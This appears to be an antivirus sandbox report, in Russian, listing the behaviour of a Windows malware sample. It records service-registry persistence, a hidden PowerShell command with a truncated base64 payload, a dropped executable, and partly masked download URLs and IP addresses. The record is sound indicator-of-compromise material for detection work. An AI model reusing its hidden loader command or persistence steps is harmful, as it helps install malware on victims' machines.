Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\guidshext] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\guidshext] 'ImagePath' = '"%WINDIR%\SysWOW64\guidshext.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...
- %HOMEPATH%\469.exe
- %HOMEPATH%\469.exe в %WINDIR%\syswow64\guidshext.exe
- http://aq###uore.com/wp-admin/z7z8-u7hfr-511/
- http://81.###.253.80:443/Ax9yRybh2oSb via 81.##4.253.80
- http://98.##.140.226/1PVRH
- DNS ASK aq###uore.com
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\guidshext.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...' (со скрытым окном)